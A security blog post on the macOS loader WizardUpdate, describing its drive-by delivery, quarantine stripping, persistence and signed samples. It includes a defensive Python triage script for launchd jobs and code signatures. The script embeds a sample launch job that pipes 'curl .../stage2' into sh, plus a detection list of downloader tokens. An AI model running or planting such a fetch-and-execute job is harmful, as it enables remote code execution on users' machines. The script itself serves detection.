
Malware Update: WizardUpdate Has New Capabilities

Introduction
On October 22nd of this year, Sergiu Gatlan of BleepingComputer.com posted a story on the new capabilities of the WizardUpdate malware and the tactics it now uses to evade detection.

What Happened?

WizardUpdate has been active since at least November 2020 and has steadily evolved, adding the ability to fetch secondary payloads from cloud hosting and to bypass Gatekeeper.

WizardUpdate, also known as UpdateAgent and Vigram, is macOS malware that attackers deliver through ‘drive-by downloads’: downloads triggered simply by visiting a compromised or malicious site and performed as a “silent install,” so the user sees no notification or other sign that anything was installed. Once installed, the malware collects and exfiltrates information about the system it is running on, creates working folders, and attempts to elevate the privileges of the account it runs under.

Once running, it may download further malware such as ‘Adload,’ adware that hijacks search-engine traffic to generate revenue for the operators and keeps modifying system settings to gain wider access. To stay resident, WizardUpdate removes the quarantine attribute from the files it drops (so Gatekeeper never prompts on them), registers scheduled persistence jobs that relaunch it, and deletes files and folders once they are no longer in use.
The larger threat, however, is that this loader gives attackers a reliable channel for delivering far more dangerous payloads. Without prompt detection and quarantine or removal, it could cause significant damage and financial loss for users and organizations.

It is also important to note that many of the samples found so far are signed with valid Developer ID certificates issued by Apple, which means they run without complaint under default Gatekeeper settings. At this time there is no indication of how the malware developers obtained those certificates.
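The persistence, quarantine-stripping and Developer ID traits described above are all things a defender can check for on a Mac. The script below is an added example written for this page, not code from the article, BleepingComputer or Microsoft. It assumes the standard launchd plist directories and the macOS `xattr` and `codesign` tools; the plist and `codesign` output embedded in it are constructed samples, not real WizardUpdate artifacts, and the paths and labels in them are illustrative.

```python
"""Triage helpers for the WizardUpdate/UpdateAgent traits discussed above:
launchd persistence jobs, a cleared quarantine attribute, and a valid
Developer ID signature that must not be read as proof of legitimacy.

Added example (not the article's or any vendor's code). Assumes macOS
launchd layout plus the `xattr` and `codesign` tools; all samples below
are constructed for illustration.
"""
import plistlib
import re
import subprocess
from pathlib import Path
from typing import Optional

# Locations a legitimate launch job rarely points at but droppers commonly use.
SUSPICIOUS_PATH_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
# Tokens typical of a loader-style job: fetch a second stage, hand it to an interpreter.
DOWNLOADER_TOKENS = ("curl", "wget", "osascript", "base64", "bash -c", "sh -c")


def assess_launch_job(plist_bytes: bytes) -> dict:
    """Parse one launchd plist and list traits typical of a malware persistence job."""
    job = plistlib.loads(plist_bytes)            # handles XML and binary plists
    args = [str(a) for a in job.get("ProgramArguments") or []]
    program = str(job.get("Program") or (args[0] if args else ""))
    findings = []
    if program and not program.startswith("/"):
        findings.append("relative program path (resolved at runtime, easy to hijack)")
    if program.startswith(SUSPICIOUS_PATH_PREFIXES):
        findings.append("program in temp or shared location")
    if any(part.startswith(".") for part in Path(program).parts):
        findings.append("hidden path component")
    joined = " ".join(args)
    for tok in DOWNLOADER_TOKENS:
        if tok in joined:
            findings.append(f"downloader/interpreter token: {tok}")
    if job.get("RunAtLoad") and (job.get("KeepAlive") or job.get("StartInterval")):
        findings.append("run-at-load plus keepalive/interval (stays resident)")
    return {"label": str(job.get("Label", "")), "program": program, "findings": findings}


def scan_launch_dirs(dirs=None) -> list:
    """Walk the launchd directories and return every job with at least one finding."""
    if dirs is None:
        dirs = [Path("/Library/LaunchAgents"), Path("/Library/LaunchDaemons")]
        try:
            dirs.insert(0, Path.home() / "Library" / "LaunchAgents")
        except RuntimeError:                     # no resolvable home directory
            pass
    hits = []
    for d in dirs:
        if not d.is_dir():
            continue
        for p in sorted(d.glob("*.plist")):
            try:
                report = assess_launch_job(p.read_bytes())
            except Exception as exc:             # an unparseable plist is itself worth a look
                report = {"label": p.name, "program": "", "findings": [f"unparseable plist: {exc}"]}
            if report["findings"]:
                report["path"] = str(p)
                hits.append(report)
    return hits


def quarantine_state(path: str) -> Optional[str]:
    """Read com.apple.quarantine with the macOS `xattr` tool.
    Returns the attribute value, "" when it is absent (the state the loader leaves
    dropped files in by stripping it), or None when xattr is unavailable."""
    try:
        r = subprocess.run(["xattr", "-p", "com.apple.quarantine", path],
                           capture_output=True, text=True, check=False)
    except FileNotFoundError:
        return None
    return r.stdout.strip() if r.returncode == 0 else ""


def parse_codesign(text: str) -> dict:
    """Summarise `codesign -dvvv` output (which codesign prints on stderr).
    A Developer ID leaf chaining to Apple Root CA is exactly what lets a sample
    pass default Gatekeeper, so True means "runs unchallenged", not "trusted"."""
    authorities = re.findall(r"^Authority=(.+)$", text, re.M)
    team = re.search(r"^TeamIdentifier=(.+)$", text, re.M)
    dev_id_leaf = bool(authorities) and authorities[0].startswith("Developer ID Application")
    return {
        "authorities": authorities,
        "team_id": team.group(1).strip() if team else None,
        "developer_id_signed": dev_id_leaf and "Apple Root CA" in authorities,
    }


# Constructed sample: a loader-style job that re-fetches its second stage every 5 minutes.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -s http://127.0.0.1/stage2 | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>300</integer>
</dict></plist>"""

# Constructed sample: an ordinary system-style job that should produce no findings.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper</string>
  <key>Program</key><string>/usr/libexec/example-helper</string>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

# Constructed sample of `codesign -dvvv` output with a (hypothetical) Developer ID chain.
SAMPLE_CODESIGN = """Executable=/Users/Shared/.hidden/UpdateAgent
Identifier=com.example.updateagent
TeamIdentifier=ABCDE12345
Authority=Developer ID Application: Example Corp (ABCDE12345)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
"""

if __name__ == "__main__":
    print(assess_launch_job(SAMPLE_PLIST))
    print(assess_launch_job(BENIGN_PLIST))
    print(parse_codesign(SAMPLE_CODESIGN))
    for hit in scan_launch_dirs():          # live scan of this host's launchd directories
        print(hit)
```

On a live Mac, feed `parse_codesign` the output of `codesign -dvvv <path> 2>&1` and `quarantine_state` the path of any binary a flagged job points at: a Developer ID chain that validates together with an absent quarantine attribute is precisely the combination the article describes, and is a reason to look harder rather than to move on.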

Recommendations
— Update your Mac systems to the latest version.
— Ensure your antivirus and anti-malware software is up to date.
— Use multi-factor authentication.
— Monitor your systems and networks for unusual activity.